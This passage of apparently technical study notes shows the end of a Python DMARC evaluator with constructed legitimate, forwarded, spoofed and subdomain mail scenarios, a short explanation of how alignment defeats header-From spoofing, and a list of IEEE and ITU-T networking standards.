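        return "pass", "none"          # one aligned pass is enough
    action = policy["p"] if hf.lower() == org_domain(hf) else policy["sp"]
    return "fail", action


# Constructed scenarios
LEGIT = dict(header_from="example.com", spf_result="pass", spf_domain="mail.example.com",
             dkim_result="pass", dkim_domain="example.com")   # SPF not strictly aligned, DKIM aligned
FORWARDED = dict(header_from="example.com", spf_result="fail", spf_domain="example.com",
                 dkim_result="pass", dkim_domain="example.com")   # SPF breaks on forwarding, DKIM survives
SPOOFED = dict(header_from="example.com", spf_result="pass", spf_domain="attacker.example",
               dkim_result="none", dkim_domain=None)   # SPF passes for the attacker's own domain
SUBDOMAIN_BAD = dict(header_from="news.example.com", spf_result="softfail",
                     spf_domain="news.example.com", dkim_result="fail", dkim_domain="example.com")
NO_POLICY = dict(header_from="other.example", spf_result="pass", spf_domain="other.example")

if __name__ == "__main__":
    for name, m in [("legit", LEGIT), ("forwarded", FORWARDED), ("spoofed", SPOOFED),
                    ("subdomain", SUBDOMAIN_BAD), ("no-policy", NO_POLICY)]:
        print(name, "->", evaluate_dmarc(m))
```

The SPOOFED scenario is the header-from spoofing case: SPF alone says "pass" because the attacker's envelope domain has a valid record, and only the alignment check against the header From: turns that into a reject. Rolling out a policy in the order p=none (collect reports), then quarantine, then reject is the usual way to find legitimate senders that are not yet aligned before enforcement breaks them.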

IEEE STANDARDS
802.3 Ethernet
802.11 Wireless
802.11ac Gigabit 5 GHz wireless (Wi-Fi 5)
802.11i Wireless security (WPA2)
802.15 Bluetooth / Zigbee (PAN)
802.1x Port-based network access control (carries EAP)
X.509 Digital certificates (ITU-T standard, not IEEE)
X.400 Message handling / email addressing (ITU-T standard, not IEEE)
